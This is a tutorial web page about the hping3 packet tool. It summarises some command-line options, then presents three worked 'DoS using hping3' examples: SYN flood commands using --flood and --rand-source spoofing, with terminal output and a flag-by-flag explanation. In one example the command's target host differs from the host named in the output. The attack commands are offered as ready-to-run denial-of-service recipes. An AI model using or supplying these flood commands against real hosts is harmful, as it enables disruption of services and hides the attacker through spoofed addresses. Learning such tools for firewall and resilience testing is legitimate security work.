Hping3

Description

hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Using hping3 you are able to perform at least the following stuff:

– Test firewall rules – Advanced port scanning – Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. – Path MTU discovery – Transferring files between even really fascist firewall rules. – Traceroute-like under different protocols. – Firewalk-like usage. – Remote OS fingerprinting. – TCP/IP stack auditing. – A lot of others.

Base Options

-h –help

Show an help screen on standard output, so you can pipe to less. hping3

-v –version

Show version information and API used to access to data link layer, linux sock packet or libpcap.

-c –count count

Stop after sending (and receiving) count response packets. After last packet was send hping3 wait COUNTREACHED_TIMEOUT seconds target host replies. You are able to tune COUNTREACHED_TIMEOUT editing hping3.h

-i –interval

Wait the specified number of seconds or micro seconds between sending each packet. –interval X set wait to X seconds, –interval uX set wait to X micro seconds. The default is to wait one second between each packet. Using hping3 to transfer files tune this option is really important in order to increase transfer rate. Even using hping3 to perform idle/spoofing scanning you should tune this option, see HPING3-HOWTO for more information.

–fast

Alias for -i u10000. Hping will send 10 packets for second.

–faster

Alias for -i u1. Faster then –fast  (but not as fast as your computer can send packets due to the signal-driven design).

–flood

Sent packets as fast as possible, without taking care to show incoming replies. This is ways faster than to specify the -i u0 option.

-n –numeric

Numeric output only, No attempt will be made to lookup symbolic names for host addresses.

-q –quiet

Quiet output. Nothing is displayed except the summary lines at startup time and when finished.

-I –interface interface name

By default on linux and BSD systems hping3 uses default routing interface. In other systems or when there is no default route hping3 uses the first non-loopback interface. However you are able to force hping3 to use the interface you need using this option. Note: you don’t need to specify the whole name, for example -I et will match eth0 ethernet0 myet1 et cetera. If no interfaces match hping3 will try to use lo.

-V –verbose

Enable verbose output. TCP replies will be shown as follows:

len=46 ip=192.168.1.1 flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0

-D –debug

Enable debug mode, it’s useful when you experience some problem with hping3. When debug mode is enabled you will get more information about interface detection, data link layer access, interface settings, options parsing, fragmentation, HCMP protocol and other stuff.

-z –bind

Bind CTRL+Z to time to live (TTL) so you will able to increment/decrement ttl of outgoing packets pressing CTRL+Z once or twice.

-Z –unbind

Unbind CTRL+Z so you will able to stop hping3.

–beep

Beep for every matching received packet (but not for ICMP errors).

Example DoS using hping3

cyborg@cyborg:~$ sudo hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.example.com

HPING www.example.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown

^C
--- www.example.com hping statistic ---
1189112 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$

Let me explain the syntax’s used in this command:

  1. hping3 = Name of the application binary.

  2. -c 100000 = Number of packets to send.

  3. -d 120 = Size of each packet that was sent to target machine.

  4. -S = I am sending SYN packets only.

  5. -w 64 = TCP window size.

  6. -p 21 = Destination port (21 being FTP port). You can use any port here.

  7. --flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.

  8. --rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.

  9. www.example.com = Destination IP address or target machines IP address. You can also use a website name here. In my case resolves to 127.0.0.1 (as entered in /etc/hosts file)

Simple SYN flood – DoS using HPING3

cyborg@cyborg:~$ sudo hping3 -S --flood -V www.hping3testsite.com
using lo, addr: 127.0.0.1, MTU: 65536 
HPING www.example.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes 
hping in flood mode, no replies will be shown 
^C --- 
www.example.com hping statistic --- 
746021 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$

Simple SYN flood with spoofed IP – DoS using HPING3

cyborg@cyborg:~$ sudo hping3 -S -P -U --flood -V --rand-source www.example.com 
using lo, addr: 127.0.0.1, MTU: 65536 
HPING www.example.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes 
hping in flood mode, no replies will be shown 
^C 
--- www.example.com hping statistic --- 
554220 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?